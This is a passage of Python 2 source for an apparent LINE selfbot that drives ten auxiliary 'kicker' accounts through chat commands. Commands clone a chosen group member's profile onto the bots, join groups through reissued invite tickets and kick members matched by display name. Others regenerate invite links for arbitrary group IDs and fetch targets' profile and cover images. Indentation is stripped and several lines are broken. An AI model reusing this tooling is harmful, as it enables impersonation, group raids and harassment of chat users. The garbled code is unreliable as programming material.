ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki1.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki1.updateGroup(G)
#================================================#
elif msg.text in ["Gcreator:inv","เชิญเเอทมิน"]:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
#============================
elif "kick1 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick1 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki1.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki1.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki1.CloneContactProfile(target)
ki1.sendText(msg.to, "kickเกอร์ 1.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "kick2 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick2 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki2.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki2.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki2.CloneContactProfile(target)
ki2.sendText(msg.to, "kickเกอร์ 2.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "kick3 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick3 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki3.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki3.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki3.CloneContactProfile(target)
ki3.sendText(msg.to, "kickเกอร์ 3.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "kick4 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick4 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki4.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki4.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki4.CloneContactProfile(target)
ki4.sendText(msg.to, "kickเกอร์ 4.👌\nแปลงร่าง อวตาง\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "kick5 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick5 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki5.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki5.CloneContactProfile(target)
ki5.sendText(msg.to, "kickเกอร์ 5.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "kick6 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick6 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki6.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki6.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki6.CloneContactProfile(target)
ki6.sendText(msg.to, "kickเกอร์ 6.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "kick7 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick7 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki7.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki7.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki7.CloneContactProfile(target)
ki7.sendText(msg.to, "kickเกอร์ 7.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "kick8 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick8 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki8.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki8.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki8.CloneContactProfile(target)
ki8.sendText(msg.to, "kickเกอร์ 8.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "kick9 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick9 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki9.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki9.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki9.CloneContactProfile(target)
ki9.sendText(msg.to, "kickเกอร์ 9.👌\nแปลงร้าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "kick10 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick10 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki10.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki10.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki10.CloneContactProfile(target)
ki10.sendText(msg.to, "kickเกอร์ 10.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
#=======================================================#
elif "kickทั้งหมด @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kickทั้งหมด @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki1.CloneContactProfile(target)
ki1.sendText(msg.to, "kickเกอร์ 1.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki2.CloneContactProfile(target)
ki2.sendText(msg.to, "kickเกอร์ 2.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki3.CloneContactProfile(target)
ki3.sendText(msg.to, "kickเกอร์ 3.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki4.CloneContactProfile(target)
ki4.sendText(msg.to, "kickเกอร์ 4.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki5.CloneContactProfile(target)
ki5.sendText(msg.to, "kickเกอร์ 5.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki6.CloneContactProfile(target)
ki6.sendText(msg.to, "kickเกอร์ 6.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki7.CloneContactProfile(target)
ki7.sendText(msg.to, "kickเกอร์ 7.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki8.CloneContactProfile(target)
ki8.sendText(msg.to, "kickเกอร์ 8.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki9.CloneContactProfile(target)
ki9.sendText(msg.to, "kickเกอร์ 9.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki10.CloneContactProfile(target)
ki10.sendText(msg.to, "kickเกอร์ 10.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
#====================================
#================================
elif "Nk: " in msg.text:
if msg.from_ in Creator:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki2.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
nk0 = msg.text.replace("Nk: ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
targets = []
for s in X.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
if target not in admin:
ki1.kickoutFromGroup(msg.to,[target])
ki1.leaveGroup(msg.to)
ki2sendText(msg.to,"Succes BosQ")
ki3.sendText(msg.to,"Pakyu~")
else:
cl.sendText(msg.to,"Admin Detected")
else:
cl.sendText(msg.to,"Lu sape!")
#=================================
elif msg.text in ["Backup:on","Backup on","open pull back","เปิดการเชิญกลับ"]:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bos\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Backup On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Backup On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Sudah on Bos\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off","Backup off","ปิด ดีงกลับ","ปิดการเชิญกลับ"]:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bos\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Backup Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Backup Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Sudah off Bos\n\n"+ datetime.today().strftime('%H:%M:%S'))
#===========================================#
elif msg.text in ["Reject","rejec"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปฎิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["rejec invite"]:
gid = ki1.getGroupIdsInvited()
for i in gid:
ki1.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki1.sendText(msg.to,"ปฎิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
#=============================================#
elif msg.text in ["Login","ขอลิ้ง"]:
if not LINEVITLogged:
lgncall = msg.to
ki1.login(qr=True,callback=logincall)
ki1.loginResult()
user2 = ki1.getProfile().mid
LINEVITLogged = True
now2 = datetime.datetime.now()
nowT = datetime.datetime.strftime(now2,"%H")
nowM = datetime.datetime.strftime(now2,"%M")
nowS = datetime.datetime.strftime(now2,"%S")
tm = "\n\n"+nowT+":"+nowM+":"+nowS
cl.sendText(user1,"ล็อกอินสำเร็จ พร้อมใช้งานแล้ว (`・ω・´)"+tm)
else:
cl.sendText(msg.to,"ได้ทำการล็อคอินไปแล้ว")
elif msg.text.lower() == ".":
gs = []
try:
gs = cl.getGroup(msg.to).members
except:
try:
gs = cl.getRoom(msg.to).contacts
except:
pass
tlist = ""
for i in gs:
tlist = tlist+i.displayName+" "+i.mid+"\n\n"
if AsulLogged == True:
try:
ki1.sendText(user1,tlist)
except:
ki1.new_post(tlist)
else:
cl.sendText(msg.to,"ยังไม่ได้ล็อคอิน")
#========================================#
elif msg.text in ["Reject1","kick1 rejec"]:
gid = ki1.getGroupIdsInvited()
for i in gid:
ki1.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki1.sendText(msg.to,"kickเกอร์ 1\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject2","kick2 rejec"]:
gid = ki2.getGroupIdsInvited()
for i in gid:
ki2.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki2.sendText(msg.to,"kickเกอร์ 2\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject3","kick3 rejec"]:
gid = ki3.getGroupIdsInvited()
for i in gid:
ki3.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki3.sendText(msg.to,"kickเกอร์ 3\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject4","kick4 rejec"]:
gid = ki4.getGroupIdsInvited()
for i in gid:
ki4.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki4.sendText(msg.to,"kickเกอร์ 4\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject5","kick5 rejec"]:
gid = ki5.getGroupIdsInvited()
for i in gid:
ki5.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki5.sendText(msg.to,"kickเกอร์ 5\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject6","kick6 rejec"]:
gid = ki6.getGroupIdsInvited()
for i in gid:
ki6.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki6.sendText(msg.to,"kickเกอร์ 6\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject7","kick7 rejec"]:
gid = ki7.getGroupIdsInvited()
for i in gid:
ki7.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki7.sendText(msg.to,"kickเกอร์ 7\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject8","kick8 rejec"]:
gid = ki8.getGroupIdsInvited()
for i in gid:
ki8.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki8.sendText(msg.to,"kickเกอร์ 8\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject9","kick9 rejec"]:
gid = ki9.getGroupIdsInvited()
for i in gid:
ki9.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki9.sendText(msg.to,"kickเกอร์ 9\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject10","kick10 rejec"]:
gid = ki10.getGroupIdsInvited()
for i in gid:
ki10.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki10.sendText(msg.to,"kickเกอร์ 10\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
elif msg.text in ["Y1 rgroups","Y1 rgroup"]:
gid = ki1.getGroupIdsInvited()
for i in gid:
ki1.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki1.sendText(msg.to,"Bot All invitations is clean")
else:
ki1.sendText(msg.to,"拒绝了全部的邀请。")
elif msg.text in ["Add:on","Auto add:on","Add on"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ok Bosqu")
else:
cl.sendText(msg.to,"Sudah on Bosqu")
elif msg.text in ["Add:off","Auto add off","Add off"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ok Bosqu")
else:
cl.sendText(msg.to,"Sudah off Bosqu")
elif msg.text in ["R chat"]:
cl.removeAllMessages(op.param2)
cl.sendText(msg.to,"Sedang diproses...")
cl.sendText(msg.to,"Ok")
# elif "รัน @" in msg.text:
# _name = msg.text.replace("รัน @","")
# _nametarget = _name.rstrip(' ')
# gs = cl.getGroup(msg.to)
# for g in gs.members:
# if _nametarget == g.displayName:
# cl.sendText(msg.to,"เริ่มทำการรัน")
# cl.sendText(g.mid,"[☬Ŧ€ΆM฿❂Ŧ↔Pђãỳãƒir€☬]\n[By.☬ARIFISTIFIK☬]\n http://line.me/ti/p/arif.mh")
# cl.sendText(msg.to, "ทำการรันเรียบร้อย")
# print "Done spam"
#========================================
elif msg.text.lower() == 'Online check':
cl.sendText(msg.to, "โปรดรอสักครู่....")
eltime = time.time() - mulai
van = "[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\nระยะเวลาที่mybotทำงาน\n"+waktu(eltime)
cl.sendText(msg.to,van)
#========================================
elif "Message set:" in msg.text:
wait["message"] = msg.text.replace("Message set:","")
cl.sendText(msg.to,"message changed\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Add message: " in msg.text:
wait["message"] = msg.text.replace("Add message: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"done。\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Message","Com"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Coms set:" in msg.text:
c = msg.text.replace("comment:","Coms set:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment: " in msg.text:
c = msg.text.replace("Add comment: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif msg.text in ["com on","Com on","Comment:on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["com off","Com off","Comment:off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Comment","Coms"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["HHX1","Hhx1"]:
cl.sendText(msg.to,"[เช็คข้อความต้อนรับของคุณ]\n\n" + str(wait["acomment"]))
elif msg.text in ["HHX2","Hhx2"]:
cl.sendText(msg.to,"[เช็คข้อความกล่าวถึงคนออกจากกลุ่ม]\n\n" + str(wait["bcomment"]))
elif msg.text in ["HHX3","Hhx3"]:
cl.sendText(msg.to,"[เช็คข้อความกล่าวถึงคนลบสมาชิก]\n\n" + str(wait["ccomment"]))
elif "Hhx1:" in msg.text:
c = msg.text.replace("Hhx1:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!")
else:
wait["acomment"] = c
cl.sendText(msg.to,"➠ ตั้งค่าข้อความต้อนรับ👌\n\n" + c)
elif "Hhx2:" in msg.text:
c = msg.text.replace("Hhx2:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!")
else:
wait["bcomment"] = c
cl.sendText(msg.to,"➠ ตั้งค่าข้อความกล่าวถึงคนออกจากกลุ่ม👌\n\n" + c)
elif "Hhx3:" in msg.text:
c = msg.text.replace("Hhx3:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!")
else:
wait["ccomment"] = c
cl.sendText(msg.to,"➠ ตั้งค่าข้อความกล่าวถึงคนลบสมาชิก👌\n\n" + c)
elif msg.text in ["Hhx1 on"]:
if wait["acommentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already on")
else:
wait["acommentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Hhx2 on"]:
if wait["bcommentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already on")
else:
wait["bcommentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Hhx3 on"]:
if wait["ccommentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already on")
else:
wait["ccommentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Hhx1 off"]:
if wait["acommentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already off")
else:
wait["acommentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Hhx2 off"]:
if wait["bcommentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already off")
else:
wait["bcommentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Hhx3 off"]:
if wait["ccommentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already off")
else:
wait["ccommentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Gurl"]:
if msg.toType == 2:
uye = random.choice(KAC)
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
uye.updateGroup(x)
gurl = uye.reissueGroupTicket(msg.to)
uye.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
elif "Ambil QR: " in msg.text:
if msg.toType == 2:
gid = msg.text.replace("Ambil QR: ","")
gurl = cl.reissueGroupTicket(gid)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
cl.sendText(msg.to,"Not for use less than group")
elif "Y1 gurl: " in msg.text:
if msg.toType == 2:
gid = msg.text.replace("Y1 gurl: ","")
x = ki1.getGroup(gid)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki1.updateGroup(x)
gurl = ki1.reissueGroupTicket(gid)
ki1.sendText(msg.to,"line://ti/g/" + gurl)
else:
ki1.sendText(msg.to,"Not for use less than group")
elif "Y2 gurl: " in msg.text:
if msg.toType == 2:
gid = msg.text.replace("Y2 gurl: ","")
x = ki2.getGroup(gid)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki2.updateGroup(x)
gurl = ki2.reissueGroupTicket(gid)
ki2.sendText(msg.to,"line://ti/g/" + gurl)
else:
ki2.sendText(msg.to,"Not for use less than group")
#========================================
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist s")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["turn on the clock","Clock:on","Clock on","Jam on","Jam:on"]:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"༺%H:%M༻")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["turn off the clock","Clock:off","Clock off","Jam off","Jam:off"]:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif "naming: " in msg.text:
n = msg.text.replace("naming: ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"Changed to:\n\n" + n)
elif msg.text in ["Up"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"༺%H:%M༻")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Refresh to update")
else:
cl.sendText(msg.to,"Please turn on the name clock")
elif "/ " in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'id'
kata = msg.text.replace("/ ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
path = "http://chart.apis.google.com/chart?chs=480x80&cht=p3&chtt=" + result + "&chts=FFFFFF,70&chf=bg,s,000000"
urllib.urlretrieve(path, "steal.png")
tts = gTTS(text=result, lang='id')
tts.save('tts.mp3')
cl.sendImage(msg.to,"steal.png")
cl.sendText(msg.to,"DITAMPILKAN UNTUK TEXT\n" + "" + kata + "\n「SUKSES」")
cl.sendAudio(msg.to,'tts.mp3')
#========================================
elif "/ปก @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("/ปก @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithUrl(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Hack2mid:" in msg.text:
umid = msg.text.replace("Hack2mid:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithUrl(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "/รูป" in msg.text:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("/รูป","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Gak da orange")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithUrl(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
#===============================================
elif msg.text in ["Sp","sp","Speed"]:
cl.sendText(msg.to, "Progress.......")
start = time.time()
time.sleep(0.001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Bot Speed"]:
ki1.sendText(msg.to, "Progress.......")
start = time.time()
time.sleep(0.001)
elapsed_time = time.time() - start
ki1.sendText(msg.to, "%sseconds" % (elapsed_time))
ki2.sendText(msg.to, "%sseconds" % (elapsed_time))
ki3.sendText(msg.to, "%sseconds" % (elapsed_time))
ki4.sendText(msg.to, "%sseconds" % (elapsed_time))
ki5.sendText(msg.to, "%sseconds" % (elapsed_time))
ki6.sendText(msg.to, "%sseconds" % (elapsed_time))
ki7.sendText(msg.to, "%sseconds" % (elapsed_time))
ki8.sendText(msg.to, "%sseconds" % (elapsed_time))
ki9.sendText(msg.to, "%sseconds" % (elapsed_time))
ki10.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Keybot"]:
ki1.sendText(msg.to, "[DPK🐲BOT\nBy.☬ARIFISTIFIK☬]\n\n❂͜͡☆➣ Namelock on\n❂͜͡☆➣ Namelock off\n❂͜͡☆➣ Blockinvite on\n❂͜͡☆➣ Blockinvite off\n❂͜͡☆➣ Backup on\n❂͜͡☆➣ Backup off\n\n[By.☬ARIFISTIFIK☬]")
#========================================
